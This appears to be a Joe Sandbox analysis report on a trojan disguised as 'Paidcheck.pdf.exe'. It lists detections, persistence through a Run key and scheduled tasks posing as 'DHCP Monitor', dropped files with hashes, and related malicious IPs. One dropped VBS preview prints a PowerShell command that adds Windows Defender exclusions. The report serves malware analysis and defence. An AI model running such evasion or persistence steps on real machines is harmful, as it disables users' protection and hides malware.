                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@20/24@0/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 13.2% (good quality ratio 11.2%)
                                • Quality average: 63.3%
                                • Quality standard deviation: 27.4%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                • TCP Packets have been reduced to 100
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

Time | Type | Description
09:32:57 | API Interceptor | 1x Sleep call for process: Paidcheck.pdf.exe modified
09:33:48 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
09:33:50 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegAsm.exe" s>$(Arg0)
09:33:51 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
09:34:11 | API Interceptor | 32x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

Match | Associated Sample Name / URL | Detection
217.138.212.57 | PO-110940,pdf.exe | malicious

                                  Domains

                                  No context

                                  ASN

Match | Associated Sample Name / URL | Detection | Context
M247GB
• List_to_clear_62237.xlsm | malicious | 5.61.62.219
• 87597.exe | malicious | 45.141.152.18
• NJrrXRv8zV | malicious | 196.19.8.206
• DpuO7oic9y.exe | malicious | 86.106.143.143
• download.dat.exe | malicious | 194.187.251.163
• WindowsFormsApp1.exe | malicious | 194.187.251.163
• file2.exe | malicious | 141.98.102.243
• Anarchy_Client.exe | malicious | 77.243.181.86
• 2N9Nc0H82F.exe | malicious | 37.120.206.86
• VsaTool.exe | malicious | 185.156.172.76
• UpdateTool.exe | malicious | 185.156.172.76
• KaseyaFix2.exe | malicious | 185.156.172.76
• Update[1].exe | malicious | 185.156.172.76
• fpNebX354Y.exe | malicious | 185.156.172.76
• rz89FRwKvB.exe | malicious | 172.94.109.9
• XH7Kdor28T.exe | malicious | 185.144.82.239
• d7b.dll | malicious | 81.92.202.190
• SecureMessageAtt.HTML | malicious | 45.141.152.18

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
• 02_extracted.exe | malicious
• Payment Order_PDF.vbs | malicious
• Quotation.exe | malicious
• DhStRngAC2.exe | malicious
• 1.exe | malicious
• Img 06 30 2021 4677.exe | malicious
• Purchase#20880.pdf.exe | malicious
• 2216DAF252B5F3B4B00238A097E0DF2A57C20780DCE0F.exe | malicious
• pVOLEckzk1.exe | malicious
• 12ThYgKql3.exe | malicious
• Invoice NeededPDF.exe | malicious
• LKpLx8L8q9.exe | malicious
• 3y4JNjrN1C.exe | malicious
• SecuriteInfo.com.Trojan.GenericKD.37108638.5946.exe | malicious
• kYvdP38gUv.exe | malicious
• qfjDTDPA9L.exe | malicious
• wmaJOYGy7Q.exe | malicious
• Trainer v22.3.exe | malicious
• Trainer v 4.6.1.exe | malicious
• PO 389293LC_pdf.exe | malicious

                                                                          Created / dropped Files

                                                                          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):64616
                                                                          Entropy (8bit):6.037264560032456
                                                                          Encrypted:false
                                                                          SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                                                                          MD5:6FD7592411112729BF6B1F2F6C34899F
                                                                          SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                                                                          SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                                                                          SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                                                                          Malicious:false
                                                                          Antivirus:
• Antivirus: Virustotal, Detection: 0%
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 02_extracted.exe, Detection: malicious
• Filename: Payment Order_PDF.vbs, Detection: malicious
• Filename: Quotation.exe, Detection: malicious
• Filename: DhStRngAC2.exe, Detection: malicious
• Filename: 1.exe, Detection: malicious
• Filename: Img 06 30 2021 4677.exe, Detection: malicious
• Filename: Purchase#20880.pdf.exe, Detection: malicious
• Filename: 2216DAF252B5F3B4B00238A097E0DF2A57C20780DCE0F.exe, Detection: malicious
• Filename: pVOLEckzk1.exe, Detection: malicious
• Filename: 12ThYgKql3.exe, Detection: malicious
• Filename: Invoice NeededPDF.exe, Detection: malicious
• Filename: LKpLx8L8q9.exe, Detection: malicious
• Filename: 3y4JNjrN1C.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.GenericKD.37108638.5946.exe, Detection: malicious
• Filename: kYvdP38gUv.exe, Detection: malicious
• Filename: qfjDTDPA9L.exe, Detection: malicious
• Filename: wmaJOYGy7Q.exe, Detection: malicious
• Filename: Trainer v22.3.exe, Detection: malicious
• Filename: Trainer v 4.6.1.exe, Detection: malicious
• Filename: PO 389293LC_pdf.exe, Detection: malicious
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Paidcheck.pdf.exe.log
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):1119
                                                                          Entropy (8bit):5.356708753875314
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                          MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                          SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                          SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                          SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                          Malicious:true
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:true
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:false
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):14734
                                                                          Entropy (8bit):4.993014478972177
                                                                          Encrypted:false
                                                                          SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                          MD5:8D5E194411E038C060288366D6766D3D
                                                                          SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                          SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                          SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                          Malicious:false
                                                                          Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):22180
                                                                          Entropy (8bit):5.6036359814823635
                                                                          Encrypted:false
                                                                          SSDEEP:384:2tCD+0oF8RO6c9Q2M4KnQwICu7V9wmSJUeRe1BMkmZZkV7ENWDOD4I5iOYs:/O6QE4KQw9VmXeNDW42S
                                                                          MD5:479FD065539F6CB9A9073194EE43BA62
                                                                          SHA1:A42CBC7BA81ABA1675795855760D409D15B519A0
                                                                          SHA-256:CD0AC9E26FBF8ED83477179601F435FF3AB5C7E265A3267F2BD55F9A564558D6
                                                                          SHA-512:873047CDCAD971FB4AE20D00592B561E6DB24022BE65F761260354608C0EE772E931EF56CEF7F6D122690DD68E8364D9E147A386B330A9C461D0F9AE72607581
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):64616
                                                                          Entropy (8bit):6.037264560032456
                                                                          Encrypted:false
                                                                          SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                                                                          MD5:6FD7592411112729BF6B1F2F6C34899F
                                                                          SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                                                                          SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                                                                          SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Virustotal, Detection: 0%
                                                                          • Antivirus: Metadefender, Detection: 0%
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):182
                                                                          Entropy (8bit):4.995421543347364
                                                                          Encrypted:false
                                                                          SSDEEP:3:FER/n0eFHgSSJJF2uV1HeGAFddGeWLCXknRAuWXp5cViEaKC5SufyM1K/RFofD6T:FER/lFHsCu/eGgdEYmRAuWXp+NaZ5Su4
                                                                          MD5:8F1279E3972239624A9E5037A4261E8A
                                                                          SHA1:D45F5CD9A81863BF6B486F77FCB0A1497DD46446
                                                                          SHA-256:C07EF3D32222554903427589627F33C222F6D507D1F161A5FCD11EBF29BFA6CC
                                                                          SHA-512:F0380E6ED1B58EE2A9B83D662E0486AF7352B5B72F72375B72F69E567297F3DC08AD372045E58DD81BC62DE32C9DB22F7A670D208F80B2BEC83B941FF790EDE8
                                                                          Malicious:true
                                                                          Preview: CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'", 0, False
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qglplkd.nbo.ps1
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ai3xzej.ihr.psm1
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1307
                                                                          Entropy (8bit):5.1055546710401485
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0aa5xtn:cbk4oL600QydbQxIYODOLedq3Ba5j
                                                                          MD5:E1762CDA6D6A3715B829E81B77FF06F7
                                                                          SHA1:B9F6318A5E4CDB1462E45A0B08EE46D303C40715
                                                                          SHA-256:48A86564D25864484ABE34BAA5B71890B8AF30ADE8AC1CF14BBACAE28036F09F
                                                                          SHA-512:DC6218645DBE168DCB8DE01124694FF26ED033E7A5CE066FAA1D00817F2E51D167938B4FF4231F514F60895EF0FFE95880D401358C69E49126A219CBF7D3E705
                                                                          Malicious:true
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1310
                                                                          Entropy (8bit):5.109425792877704
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                                          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                                          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                                          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                                          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                                          Malicious:false
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):232
                                                                          Entropy (8bit):7.024371743172393
                                                                          Encrypted:false
                                                                          SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                                          MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                                          SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                                          SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                                          SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):3.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Wn:Wn
                                                                          MD5:31760B024C72A6DB96428A87598EDAD6
                                                                          SHA1:26D9DC8EE0FEF7C95EDF8865F54A2477F5B2830D
                                                                          SHA-256:A41605947ADFFD965CFD275409AFE1E71BD692055EB86F3E60F3090D35389FA8
                                                                          SHA-512:2A9C2BB93EF3B50FDA97CACF51FF2228FFADDB33BEFD9062370D240141BE2D6121EFE244F7642926E51487D47BBC504C9B24CCDF9BB81C867974C07A4AFFC343
                                                                          Malicious:true
                                                                          Preview: pf.y.M.H
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):24
                                                                          Entropy (8bit):4.501629167387823
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                                                          MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                                                          SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                                                          SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                                                          SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):5.320159765557392
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                                                          MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                                                          SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                                                          SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                                                          SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):327432
                                                                          Entropy (8bit):7.99938831605763
                                                                          Encrypted:true
                                                                          SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                                          MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                                          SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                                          SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                                          SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):44
                                                                          Entropy (8bit):4.308768198567054
                                                                          Encrypted:false
                                                                          SSDEEP:3:oNWXp5cViE2J5xAI0L4A:oNWXp+N23f0L4A
                                                                          MD5:C9298EEE68389B937EFD1A5CE3DB10A2
                                                                          SHA1:2D299BA869C5386FB114AA6016DCB0607DFE98E0
                                                                          SHA-256:270C3AC669C532CE18737BFD72CB2981B65A6F08FF2B7EB5C9A4D8834AEB4E62
                                                                          SHA-512:1EF5C4AC44E1658DC8EA56F98B2714297D39937B9817E4F843D067F59D2778EC3D65E34DD467442F8B7D86248813E834D47A71D79EC3CE2D8E54B8A41BF19FDE
                                                                          Malicious:false
                                                                          Preview: C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):580096
                                                                          Entropy (8bit):6.242459409423084
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UyVRMbXAPtBXomNFYmujpihOcn92JRVkxdGOcA1WJIq:UyVRxPtB3Cjpihvn+VkxIE1c
                                                                          MD5:CE32E8605ADB6C9BB2DCEE69FE887B46
                                                                          SHA1:2ACE1FB1E3523768003B61A4A79193214FFAFED9
                                                                          SHA-256:7E22F7F21E8798805234BE7AC26BAD65C1EDECB55B051343E0933A68041CE073
                                                                          SHA-512:674AD1360E6ED0E1C77865858C08950D6955F8A56544343E9414320470D80258E4FAD0D67EE64423CBC792BFBF2CD6FEE2C1806A837B61F62B7F71C10FE2D9FC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 33%
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe:Zone.Identifier
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                          C:\Users\user\Documents\20210722\PowerShell_transcript.302494.fAvH+AQY.20210722093349.txt
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):5978
                                                                          Entropy (8bit):5.384226125292334
                                                                          Encrypted:false
                                                                          SSDEEP:96:BZ1hAZN4fqDo1ZUFZGhAZN4fqDo1ZE28srZahAZN4fqDo1ZYDiivZg:8
                                                                          MD5:AB8875BD5B3058B8423A6B26F392B5E7
                                                                          SHA1:9E45AFB3F5211658D59AC397698D841617DC7CF0
